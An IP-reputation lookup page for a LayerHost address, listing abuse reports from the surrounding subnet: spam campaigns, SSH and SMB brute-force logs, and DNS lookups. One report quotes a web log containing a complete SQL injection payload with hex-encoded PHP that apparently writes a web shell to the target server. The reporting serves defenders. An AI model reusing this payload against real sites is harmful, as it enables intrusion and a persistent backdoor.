Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: None

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
IP Type Details Datetime
104.148.18.18 spamattack
PHISHING AND SPAM ATTACK
GROUP USES LayerHost, IP SERVER LLC, Root Networks LLC, Serverion BV, XSServer GmbH, Xervers, Colocrossing
104.148.18.12	Uniswap Select - ivy-lavoi@outreachapps.club, New underground DeFi crypto - Want to get paid for holding crypto?, 7 Jul 2021 
inetnum:        2.58.148.0 - 2.58.149.255	org-name:       Serverion BV
inetnum:        5.252.192.0 - 5.252.195.255	org-name:       IP SERVER LLC
NetRange:       23.247.0.0 - 23.247.127.255	OrgName:        LayerHost
NetRange:       31.210.22.0 - 31.210.23.255	org-name:       Serverion BV
NetRange:       103.73.156.0 - 103.73.156.255	OrgName:        LayerHost
NetRange:       104.148.0.0 - 104.148.127.255	OrgName:        LayerHost
NetRange:       104.223.128.0 - 104.223.255.255 OrgName:        LayerHost
NetRange:       107.179.0.0 - 107.179.127.255	OrgName:        LayerHost
NetRange:       134.73.0.0 - 134.73.255.255	CustName:       Root Networks LLC
NetRange:       157.52.128.0 - 157.52.255.255	OrgName:        LayerHost
NetRange:       185.239.242.0 - 185.239.242.255	org-name:       Serverion BV
inetnum:        194.59.216.0 - 194.59.217.255	org-name:       Serverion BV
inetnum:        195.62.32.0 - 195.62.33.255	org-name:       XSServer GmbH
inetnum:        195.133.12.0 - 195.133.15.255   netname:        Xervers
inetnum:        195.133.39.0 - 195.133.39.255	org-name:       Serverion BV
NetRange:       198.12.64.0 - 198.12.127.255	OrgName:        ColoCrossing
Some similar emails from same group
5.252.194.15  	Plansforsheds - EasyShedPlans@ultraboostz.co, Discover The Easiest Way To Build Beautiful Sheds..., 15 Jun 2021 
31.210.22.9    	Fat belly - info@bloodpressure.buzz,  Japanese “Fix” for Belly Fat?, 17 Jun 2021
31.210.22.106  	On Hold - OnHold@ecobuds.us, Your FREE Red Laser Targeting System, 21 Jun 2021
2021-07-08 06:07:44
104.148.18.18 spamattack
PHISHING AND SPAM ATTACK
GROUP USES LayerHost, IP SERVER LLC, Root Networks LLC, Serverion BV, XSServer GmbH, Xervers, Colocrossing
104.148.18.18	Bitcoin Select arianna.lavoi@boschbuy.club, Dividends Paid Every 60 Minutes - New underground DeFi crypto, 05 Jul 2021
2.58.148.71	Save on the Cost of Gas - Effuel@shofybox.us, This Simple Device Saves You 25% on Your Car's Fuel Consumption, Wed, 7 Jul 
inetnum:        2.58.148.0 - 2.58.149.255	org-name:       Serverion BV
inetnum:        5.252.192.0 - 5.252.195.255	org-name:       IP SERVER LLC
NetRange:       23.247.0.0 - 23.247.127.255	OrgName:        LayerHost
NetRange:       31.210.22.0 - 31.210.23.255	org-name:       Serverion BV
NetRange:       103.73.156.0 - 103.73.156.255	OrgName:        LayerHost
NetRange:       104.148.0.0 - 104.148.127.255	OrgName:        LayerHost
NetRange:       104.223.128.0 - 104.223.255.255 OrgName:        LayerHost
NetRange:       107.179.0.0 - 107.179.127.255	OrgName:        LayerHost
NetRange:       134.73.0.0 - 134.73.255.255	CustName:       Root Networks LLC
NetRange:       157.52.128.0 - 157.52.255.255	OrgName:        LayerHost
NetRange:       185.239.242.0 - 185.239.242.255	org-name:       Serverion BV
inetnum:        194.59.216.0 - 194.59.217.255	org-name:       Serverion BV
inetnum:        195.62.32.0 - 195.62.33.255	org-name:       XSServer GmbH
inetnum:        195.133.12.0 - 195.133.15.255   netname:        Xervers
inetnum:        195.133.39.0 - 195.133.39.255	org-name:       Serverion BV
NetRange:       198.12.64.0 - 198.12.127.255	OrgName:        ColoCrossing
Some similar emails from same group
5.252.194.15  	Plansforsheds - EasyShedPlans@ultraboostz.co, Discover The Easiest Way To Build Beautiful Sheds..., 15 Jun 2021 
31.210.22.9    	Fat belly - info@bloodpressure.buzz,  Japanese “Fix” for Belly Fat?, 17 Jun 2021
31.210.22.106  	On Hold - OnHold@ecobuds.us, Your FREE Red Laser Targeting System, 21 Jun 2021
2021-07-08 06:03:02
104.148.12.219 spam
Borg202@889205.com
2020-09-28 16:06:42
104.148.125.224 attack
Invalid user martin from 104.148.125.224 port 59452
2020-09-25 00:39:30
104.148.125.224 attackbotsspam
Invalid user martin from 104.148.125.224 port 59452
2020-09-24 16:18:37
104.148.125.224 attackspambots
2020-09-23T22:02:17+0200 Failed SSH Authentication/Brute Force Attack.(Server 2)
2020-09-24 07:44:20
104.148.111.137 attackbots
Spam
2020-07-08 07:54:39
104.148.126.239 attackbotsspam
email spam
2019-12-19 21:33:23
104.148.105.5 attackspambots
$f2bV_matches
2019-11-21 03:09:12
104.148.105.84 attack
Nov 20 15:38:34 mxgate1 postfix/postscreen[8842]: CONNECT from [104.148.105.84]:52518 to [176.31.12.44]:25
Nov 20 15:38:34 mxgate1 postfix/dnsblog[8845]: addr 104.148.105.84 listed by domain zen.spamhaus.org as 127.0.0.3
Nov 20 15:38:34 mxgate1 postfix/dnsblog[8843]: addr 104.148.105.84 listed by domain b.barracudacentral.org as 127.0.0.2
Nov 20 15:38:40 mxgate1 postfix/postscreen[8842]: DNSBL rank 3 for [104.148.105.84]:52518
Nov x@x
Nov 20 15:38:41 mxgate1 postfix/postscreen[8842]: DISCONNECT [104.148.105.84]:52518


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=104.148.105.84
2019-11-21 01:58:02
104.148.119.2 attackspam
Autoban   104.148.119.2 AUTH/CONNECT
2019-11-18 17:29:32
104.148.105.5 attackbotsspam
SQL injection attempts.
2019-11-18 13:28:12
104.148.105.5 attack
Web app attack & sql injection attempts.
Date: 2019 Nov 17. 18:11:58
Source IP: 104.148.105.5

Portion of the log(s):
104.148.105.5 - [17/Nov/2019:18:11:57 +0100] "POST /ysyqq.php HTTP/1.1" 404 548 "http://[removed].hu/ysyqq.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
104.148.105.5 - [17/Nov/2019:18:11:56 +0100] GET /user.php?act=login HTTP/1.1" 404 548 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\x22num\x22;s:297:\x22*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -\x22;s:2:\x22id\x22;s:11:\x22-1' UNION/*\x22;}45ea207d7a2b68c49582d2d22adf953a"
104.148.105.5 - [17/Nov/2019:18:11:56 +0100] POST /fqopr.php
104.148.105.5 - [17/Nov/2019:18:11:56 +0100] POST /fdgq.php
104.148.105.5 - [17/Nov/2019:18:11:56 +0100] GET /user.php?act=login ....
2019-11-18 05:01:17
104.148.105.98 attackspam
SASL Brute Force
2019-11-15 21:03:28
104.148.105.5 attackbotsspam
php POST attempts
2019-11-15 15:28:35
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 104.148.1.66
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 11474
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;104.148.1.66.			IN	A

;; AUTHORITY SECTION:
.			447	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022022000 1800 900 604800 86400

;; Query time: 24 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Feb 20 16:33:45 CST 2022
;; MSG SIZE  rcvd: 105
Host info
Host 66.1.148.104.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 66.1.148.104.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
178.32.47.97 attack
Jan 15 12:48:41 lukav-desktop sshd\[20309\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.32.47.97  user=root
Jan 15 12:48:43 lukav-desktop sshd\[20309\]: Failed password for root from 178.32.47.97 port 43492 ssh2
Jan 15 12:53:07 lukav-desktop sshd\[12164\]: Invalid user git from 178.32.47.97
Jan 15 12:53:07 lukav-desktop sshd\[12164\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.32.47.97
Jan 15 12:53:08 lukav-desktop sshd\[12164\]: Failed password for invalid user git from 178.32.47.97 port 35364 ssh2
2020-01-15 19:19:27
103.78.83.53 attackspam
Jan 15 11:49:38 srv01 sshd[13721]: Invalid user xue from 103.78.83.53 port 34078
Jan 15 11:49:38 srv01 sshd[13721]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.78.83.53
Jan 15 11:49:38 srv01 sshd[13721]: Invalid user xue from 103.78.83.53 port 34078
Jan 15 11:49:41 srv01 sshd[13721]: Failed password for invalid user xue from 103.78.83.53 port 34078 ssh2
Jan 15 11:52:58 srv01 sshd[13964]: Invalid user bwadmin from 103.78.83.53 port 34020
...
2020-01-15 18:54:48
89.222.197.230 attackspam
Unauthorized connection attempt from IP address 89.222.197.230 on Port 445(SMB)
2020-01-15 18:52:10
68.183.155.33 attack
Jan 15 11:21:52 mail1 sshd\[1230\]: Invalid user ts3server from 68.183.155.33 port 48286
Jan 15 11:21:52 mail1 sshd\[1230\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.155.33
Jan 15 11:21:54 mail1 sshd\[1230\]: Failed password for invalid user ts3server from 68.183.155.33 port 48286 ssh2
Jan 15 11:35:19 mail1 sshd\[4501\]: Invalid user test from 68.183.155.33 port 39416
Jan 15 11:35:19 mail1 sshd\[4501\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.155.33
...
2020-01-15 19:11:59
222.186.52.78 attackbotsspam
Jan 15 11:56:48 * sshd[12413]: Failed password for root from 222.186.52.78 port 48063 ssh2
2020-01-15 19:29:49
117.2.84.101 attack
Unauthorized connection attempt from IP address 117.2.84.101 on Port 445(SMB)
2020-01-15 18:58:27
113.161.12.33 attackbotsspam
Unauthorized connection attempt from IP address 113.161.12.33 on Port 445(SMB)
2020-01-15 19:19:43
95.71.123.103 attackspambots
Invalid user phi from 95.71.123.103 port 44522
2020-01-15 18:54:08
103.106.242.100 attack
Unauthorized connection attempt from IP address 103.106.242.100 on Port 445(SMB)
2020-01-15 19:33:03
171.234.145.157 attackspam
Unauthorized connection attempt from IP address 171.234.145.157 on Port 445(SMB)
2020-01-15 19:16:49
117.201.56.186 attackspam
Unauthorized connection attempt from IP address 117.201.56.186 on Port 445(SMB)
2020-01-15 19:07:29
123.16.201.247 attackspambots
Unauthorized connection attempt from IP address 123.16.201.247 on Port 445(SMB)
2020-01-15 18:53:55
185.125.44.212 attackbots
Unauthorized connection attempt detected from IP address 185.125.44.212 to port 2220 [J]
2020-01-15 19:33:34
106.201.146.81 attackspambots
Jan 15 11:46:43 MK-Soft-VM5 sshd[15394]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.201.146.81 
Jan 15 11:46:45 MK-Soft-VM5 sshd[15394]: Failed password for invalid user operador from 106.201.146.81 port 38277 ssh2
...
2020-01-15 19:32:42
223.206.232.87 attack
Unauthorized connection attempt from IP address 223.206.232.87 on Port 445(SMB)
2020-01-15 18:59:57

Recently Reported IPs

104.145.239.95 104.148.34.247 104.148.52.208 104.148.52.219
104.148.65.213 104.148.69.174 104.148.69.178 104.148.69.181
104.148.75.240 104.148.75.244 104.148.75.247 104.148.78.89
104.148.94.162 128.177.135.205 104.149.129.230 104.149.135.198
104.149.140.46 104.149.144.218 104.149.165.218 59.153.69.93